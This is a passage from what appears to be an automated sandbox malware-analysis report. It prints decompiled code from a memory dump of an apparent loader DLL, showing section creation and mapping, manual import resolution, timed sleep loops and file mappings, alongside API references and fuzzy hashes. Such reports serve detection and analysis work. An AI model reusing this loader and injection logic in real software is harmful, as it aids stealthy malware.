				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6DDC2130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6ddc4144;
				_push(_t15 + 0x6ddc505e);
				_push(_t15 + 0x6ddc5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6DDC212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6ddc4148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6ddc1ada
0x6ddc1ae3
0x6ddc1ae7
0x6ddc1aed
0x6ddc1af2
0x6ddc1af7
0x6ddc1afa
0x6ddc1afd
0x6ddc1b02
0x6ddc1b03
0x6ddc1b06
0x6ddc1b11
0x6ddc1b18
0x6ddc1b1c
0x6ddc1b1e
0x6ddc1b1f
0x6ddc1b22
0x6ddc1b27
0x6ddc1b31
0x6ddc1b33
0x6ddc1b33
0x6ddc1b47
0x6ddc1b4d
0x6ddc1b51
0x6ddc1ba1
0x6ddc1b53
0x6ddc1b5c
0x6ddc1b72
0x6ddc1b7a
0x6ddc1b8c
0x6ddc1b90
0x00000000
0x00000000
0x6ddc1b7c
0x6ddc1b7f
0x6ddc1b84
0x6ddc1b86
0x6ddc1b86
0x6ddc1b67
0x6ddc1b69
0x6ddc1b92
0x6ddc1b93
0x6ddc1b93
0x6ddc1b5c
0x6ddc1ba9

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6DDC1AE7
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6DDC1AFD
_snwprintf.NTDLL ref: 6DDC1B22
CreateFileMappingW.KERNELBASE(000000FF,6DDC4148,00000004,00000000,?,?), ref: 6DDC1B47
GetLastError.KERNEL32 ref: 6DDC1B5E
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6DDC1B72
GetLastError.KERNEL32 ref: 6DDC1B8A
CloseHandle.KERNEL32(00000000), ref: 6DDC1B93
GetLastError.KERNEL32 ref: 6DDC1B9B

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 3ab82469bb4ffa3986cd6d701311f1665b365b90dc9ed404eca8f04aae5193d2
Instruction ID: 4ecae82c504a451d2635ce5b4ea584972b7831180dbbe05438c4a5206a2808d3
Opcode Fuzzy Hash: 3ab82469bb4ffa3986cd6d701311f1665b365b90dc9ed404eca8f04aae5193d2
Instruction Fuzzy Hash: 8421B3B2940119FFEB11BFA8CC84EAE77BEEB46354F118025F615E7140E730A9469B61

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE17B0, Relevance: 11.0, APIs: 7, Instructions: 527COMMON

Download Yara Rule

APIs

std::locale::locale.LIBCPMTD ref: 6DDE17EB

Part of subcall function 6DDE3B70: std::locale::_Init.LIBCPMT ref: 6DDE3B79

_setlocale.LIBCMT ref: 6DDE17FE

Part of subcall function 6DDEC33C: _mbstowcs_s.LIBCMT ref: 6DDEC362
Part of subcall function 6DDEC33C: __invoke_watson.LIBCMT ref: 6DDEC37D
Part of subcall function 6DDEC33C: __calloc_crt.LIBCMT ref: 6DDEC387

SetConsoleOutputCP.KERNELBASE(000004E3), ref: 6DDE181E
GetModuleFileNameA.KERNELBASE(00000000,6DE1CB58,000008C6,?,?,00000006,00000000), ref: 6DDE1850
SetConsoleCP.KERNELBASE(00000000), ref: 6DDE18D9
_malloc.LIBCMT ref: 6DDE18E4
GetCurrentDirectoryA.KERNEL32(000008C6,?,00000000), ref: 6DDE1A5B

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: Console$CurrentDirectoryFileInitModuleNameOutput__calloc_crt__invoke_watson_malloc_mbstowcs_s_setlocalestd::locale::_std::locale::locale
String ID:
API String ID: 1969868346-0
Opcode ID: 26a884400d232cf3bb0b6622fb28716775e2d42a209138803870be165c45ba7a
Instruction ID: a7c3f0db16dad4f682c034d0042f5f6ce545a95ee1b192f07e74e29f45f7acaa
Opcode Fuzzy Hash: 26a884400d232cf3bb0b6622fb28716775e2d42a209138803870be165c45ba7a
Instruction Fuzzy Hash: 404204B0F04209DFCB08DFA8D992B9DBBF6FB8A344F10821AE425A7355E730A545CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1996, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDC1996(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6DDC1A44(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6ddc199f
0x6ddc19a6
0x6ddc19a7
0x6ddc19a8
0x6ddc19a9
0x6ddc19aa
0x6ddc19bb
0x6ddc19bf
0x6ddc19d3
0x6ddc19d6
0x6ddc19d9
0x6ddc19e0
0x6ddc19e3
0x6ddc19ea
0x6ddc19ed
0x6ddc19f0
0x6ddc19f3
0x6ddc19f8
0x6ddc1a33
0x6ddc19fa
0x6ddc19fd
0x6ddc1a03
0x6ddc1a08
0x6ddc1a0c
0x6ddc1a2a
0x6ddc1a0e
0x6ddc1a15
0x6ddc1a23
0x6ddc1a23
0x6ddc1a0c
0x6ddc1a3b

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000), ref: 6DDC19F3

Part of subcall function 6DDC1A44: NtMapViewOfSection.NTDLL(00000000,000000FF,6DDC1A08,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6DDC1A08,?), ref: 6DDC1A71

memset.NTDLL ref: 6DDC1A15

Strings

@, xrefs: 6DDC19E3

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
Instruction ID: 3a5f76ec92061636a63a553e1438b047c9baee40ccadadbae6e22ee9e40efb43
Opcode Fuzzy Hash: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
Instruction Fuzzy Hash: C7212CB6D00219AFDB11DFA9C8849EEFBF9FF48354F108469E655F3210D730AA458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1BAC, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDC1BAC(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6ddc4140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6ddc1bac
0x6ddc1bb5
0x6ddc1bba
0x6ddc1bc0
0x6ddc1bc9
0x6ddc1bcf
0x6ddc1bd1
0x6ddc1bd4
0x6ddc1bd9
0x6ddc1be0
0x6ddc1be0
0x6ddc1be4
0x6ddc1bea
0x6ddc1bef
0x00000000
0x00000000
0x6ddc1bf5
0x6ddc1bff
0x6ddc1c01
0x6ddc1c04
0x6ddc1c07
0x6ddc1c0b
0x6ddc1c13
0x6ddc1c15
0x6ddc1c18
0x6ddc1c80
0x6ddc1c80
0x6ddc1c84
0x00000000
0x00000000
0x6ddc1c1d
0x6ddc1c23
0x6ddc1c25
0x6ddc1c38
0x6ddc1c3b
0x6ddc1c3b
0x6ddc1c3b
0x6ddc1c3f
0x6ddc1c27
0x6ddc1c27
0x6ddc1c2f
0x6ddc1c31
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddc1c31
0x6ddc1c1f
0x6ddc1c1f
0x6ddc1c33
0x6ddc1c33
0x6ddc1c33
0x6ddc1c42
0x6ddc1c45
0x6ddc1c47
0x6ddc1c4e
0x6ddc1c49
0x6ddc1c49
0x6ddc1c49
0x6ddc1c56
0x6ddc1c5c
0x6ddc1c5e
0x6ddc1c8e
0x6ddc1c60
0x6ddc1c60
0x6ddc1c63
0x6ddc1c65
0x6ddc1c6d
0x6ddc1c6d
0x6ddc1c72
0x6ddc1c74
0x6ddc1c7b
0x6ddc1c7d
0x6ddc1c7d
0x6ddc1c7d
0x00000000
0x6ddc1c7d
0x00000000
0x6ddc1c5e
0x6ddc1c0d
0x6ddc1c0d
0x6ddc1c11
0x00000000
0x00000000
0x6ddc1c11
0x6ddc1c91
0x6ddc1c91
0x6ddc1c98
0x6ddc1c9d
0x00000000
0x00000000
0x6ddc1ca3
0x6ddc1cae
0x00000000
0x6ddc1cae
0x6ddc1ca5
0x6ddc1ca5
0x6ddc1cab
0x00000000
0x6ddc1cab
0x6ddc1bd9
0x6ddc1caf
0x6ddc1cb4

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6DDC1BE4
GetProcAddress.KERNEL32(?,00000000), ref: 6DDC1C56

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 536df1448590074ec79bf0f91e4a04f4a7f6fb9d0b49f8b08bd42e7726929f1e
Instruction ID: 6dc99718c974a1845afe6ff6d0371c88e0921838e1b55e4c9413d0fd732c4a15
Opcode Fuzzy Hash: 536df1448590074ec79bf0f91e4a04f4a7f6fb9d0b49f8b08bd42e7726929f1e
Instruction Fuzzy Hash: 42310271A0422ADFEB05DF59CA80AAEB7F9BF05350F608069F851EB241E770DA41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1A44, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DDC1A44(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6ddc1a56
0x6ddc1a5c
0x6ddc1a6a
0x6ddc1a71
0x6ddc1a76
0x6ddc1a7c
0x00000000
0x6ddc1a7d
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,6DDC1A08,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6DDC1A08,?), ref: 6DDC1A71

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 0dde2bf400d65ed6c62eb044af9a283f7328fb92e5dbd1865b7d6c0945ab6503
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 18F012B590020CBFEB119FA5CC85C9FBBBDEB44394F104A39F152E2090D6309E098A61

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1456, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6DDC1456(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6DDC1F0E();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6DDC1717(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6DDC155C(E6DDC1E55,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6DDC1F87(_t44,  &_a4) != 0) {
					 *0x6ddc4138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x6ddc4138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6DDC2009(_t48 + _t14);
				 *0x6ddc4138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E6DDC201E(_t43);
				goto L11;
			}

0x6ddc145d
0x6ddc1464
0x6ddc1469
0x6ddc1559
0x6ddc1559
0x6ddc1470
0x6ddc1474
0x6ddc147a
0x6ddc1488
0x6ddc1489
0x6ddc148c
0x6ddc148f
0x6ddc1498
0x6ddc149b
0x6ddc14a1
0x6ddc14a4
0x6ddc14ab
0x6ddc1556
0x00000000
0x6ddc1556
0x6ddc14b5
0x6ddc1506
0x6ddc1506
0x6ddc151c
0x6ddc1521
0x6ddc1549
0x6ddc1523
0x6ddc1526
0x6ddc152c
0x6ddc1531
0x6ddc1538
0x6ddc1538
0x6ddc153f
0x6ddc153f
0x6ddc154c
0x6ddc1552
0x6ddc1554
0x6ddc1554
0x00000000
0x6ddc1552
0x6ddc14c2
0x6ddc1500
0x00000000
0x6ddc1500
0x6ddc14c4
0x6ddc14c7
0x6ddc14d0
0x6ddc14d2
0x6ddc14d6
0x6ddc14f8
0x6ddc14f8
0x00000000
0x6ddc14f8
0x6ddc14d8
0x6ddc14dd
0x6ddc14e2
0x6ddc14e9
0x00000000
0x00000000
0x6ddc14ee
0x6ddc14f1
0x00000000

APIs

Part of subcall function 6DDC1F0E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DDC1462,751463F0), ref: 6DDC1F1D
Part of subcall function 6DDC1F0E: GetVersion.KERNEL32 ref: 6DDC1F2C
Part of subcall function 6DDC1F0E: GetCurrentProcessId.KERNEL32 ref: 6DDC1F48
Part of subcall function 6DDC1F0E: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DDC1F61

GetSystemTime.KERNEL32(?,00000000,751463F0), ref: 6DDC1474
SwitchToThread.KERNEL32 ref: 6DDC147A

Part of subcall function 6DDC1717: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6DDC176D
Part of subcall function 6DDC1717: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6DDC1833

Sleep.KERNELBASE(00000000,00000000), ref: 6DDC149B
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6DDC14D0
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6DDC14EE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6DDC1526
GetExitCodeThread.KERNEL32(00000000,?), ref: 6DDC1538
CloseHandle.KERNEL32(00000000), ref: 6DDC153F
GetLastError.KERNEL32(?,00000000), ref: 6DDC1547
GetLastError.KERNEL32 ref: 6DDC1554

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: d80814d8ec242dbdeb9629e5dbf2ef3520c2f632d63d02afedeb5805e5cad7ce
Instruction ID: 61b61f0ecdd809c78023f299873e0d88336a816d6c80d3ad88e034f6920a33d5
Opcode Fuzzy Hash: d80814d8ec242dbdeb9629e5dbf2ef3520c2f632d63d02afedeb5805e5cad7ce
Instruction Fuzzy Hash: 9331C272954627EBDB01FFA88844AAE77BCAF46361F110112F915D3140E734CA00DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE3020, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6DDE304A

Part of subcall function 6DDE9205: __lock.LIBCMT ref: 6DDE9216

int.LIBCPMTD ref: 6DDE3063

Part of subcall function 6DDE4660: std::_Lockit::_Lockit.LIBCPMT ref: 6DDE4676

Strings

bad cast, xrefs: 6DDE30A5

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$__lock
String ID: bad cast
API String ID: 172949856-3145022300
Opcode ID: 9df6e8a2fbdd4dc7a4f1479e5481dd39b9a98b7dc0862aded1f1a9e04466e336
Instruction ID: 15b64456f2fb6f8321cbca0d6a1e918c1acea78ab6937009f25a6beb9c7d5308
Opcode Fuzzy Hash: 9df6e8a2fbdd4dc7a4f1479e5481dd39b9a98b7dc0862aded1f1a9e04466e336
Instruction Fuzzy Hash: 5E311CB1D18209DFCB04DFA8C981BFEBBB4FB49354F104629E525A7390DB346A00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1146, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDC1146(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6DDC2009(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6ddc4144 + 0x6ddc5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6ddc4144 + 0x6ddc5151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6DDC201E(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6ddc4144 + 0x6ddc5161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6ddc4144 + 0x6ddc5174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6ddc4144 + 0x6ddc5189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6ddc4144 + 0x6ddc519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6DDC1996(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6ddc1154
0x6ddc1158
0x6ddc1219
0x6ddc115e
0x6ddc1176
0x6ddc1185
0x6ddc118c
0x6ddc118e
0x6ddc1193
0x6ddc1211
0x6ddc1212
0x6ddc1195
0x6ddc11a2
0x6ddc11a4
0x6ddc11a9
0x00000000
0x6ddc11ab
0x6ddc11b8
0x6ddc11ba
0x6ddc11bf
0x00000000
0x6ddc11c1
0x6ddc11ce
0x6ddc11d0
0x6ddc11d5
0x00000000
0x6ddc11d7
0x6ddc11e4
0x6ddc11e6
0x6ddc11eb
0x00000000
0x6ddc11ed
0x6ddc11f3
0x6ddc11f9
0x6ddc11fe
0x6ddc1203
0x6ddc1208
0x00000000
0x6ddc120a
0x6ddc120d
0x6ddc120d
0x6ddc1208
0x6ddc11eb
0x6ddc11d5
0x6ddc11bf
0x6ddc11a9
0x6ddc1193
0x6ddc1227

APIs

Part of subcall function 6DDC2009: HeapAlloc.KERNEL32(00000000,?,6DDC1FA5,00000208,00000000,00000000,?,?,?,6DDC14C0,?), ref: 6DDC2015

GetModuleHandleA.KERNEL32(?,00000020), ref: 6DDC116A
GetProcAddress.KERNEL32(00000000,?), ref: 6DDC118C
GetProcAddress.KERNEL32(00000000,?), ref: 6DDC11A2
GetProcAddress.KERNEL32(00000000,?), ref: 6DDC11B8
GetProcAddress.KERNEL32(00000000,?), ref: 6DDC11CE
GetProcAddress.KERNEL32(00000000,?), ref: 6DDC11E4

Part of subcall function 6DDC1996: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000), ref: 6DDC19F3
Part of subcall function 6DDC1996: memset.NTDLL ref: 6DDC1A15

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: e1b56adcceb12d4ad01dbe0f948ac0ba164164e33b25d09dfa5668adca6748cb
Instruction ID: 1a68cbb0048d7d71451b3bf35361be9530cf62a60320963ac5c21ed95491e9c8
Opcode Fuzzy Hash: e1b56adcceb12d4ad01dbe0f948ac0ba164164e33b25d09dfa5668adca6748cb
Instruction Fuzzy Hash: C42137B564061BEFEB11FFAAC984F6AB7FCAB19304F014426F945D7201E770E9018B61

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1D4B, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6ddc4108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6ddc410c;
						if( *0x6ddc410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6ddc4118;
								if( *0x6ddc4118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6ddc410c);
						}
						HeapDestroy( *0x6ddc4110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6ddc4108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6ddc4110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
